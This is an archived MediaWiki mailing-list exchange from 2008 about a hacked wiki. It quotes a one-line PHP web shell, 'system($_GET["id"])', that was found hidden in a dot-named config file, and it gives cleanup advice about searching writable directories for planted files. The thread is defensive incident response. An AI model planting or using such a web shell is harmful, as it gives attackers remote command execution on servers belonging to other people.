Someone uploaded that to his undeleted config directory, possibly
using a hole somewhere else on the server. Note the . name to make it
invisible.
Ittay, I'm afraid you should look for other things on the server...
once this was in, they basically had shell access via the web user. I
wouldn't be surprised if you found some nasty surprises in other
writable directories. For example, when we got broken into, we found
lots of stuff hiding in the MW image directories.
grep -r casino .
gave us lots of clues. My condolences.
JH
On Mar 14, 2008, at 11:52 AM, Brion Vibber wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Itay Ophir wrote:
| We managed to find and hopefully resolve this security hole.
|
| It was not the index.php.
|
| It was the /config/.info.php In that file there is the following
line:
|
| <?php system($_GET["id"]) ?>
MediaWiki does not contain or produce any such file.
- -- brion vibber (brion @
wikimedia.org)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iEYEARECAAYFAkfarU8ACgkQwRnhpk1wk44sPwCfWwjEGXE1u6E0k4DtP+8infgP
HDgAoL9uIXjokH4SrY5bU2OTp7L+c2Vp
=nFrt
-----END PGP SIGNATURE-----
_______________________________________________
MediaWiki-l mailing list
MediaWiki-l(a)lists.wikimedia.org
https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
=====================================
Jim Hu
Associate Professor
Dept. of Biochemistry and Biophysics
2128 TAMU
Texas A&M Univ.
College Station, TX 77843-2128
979-862-4054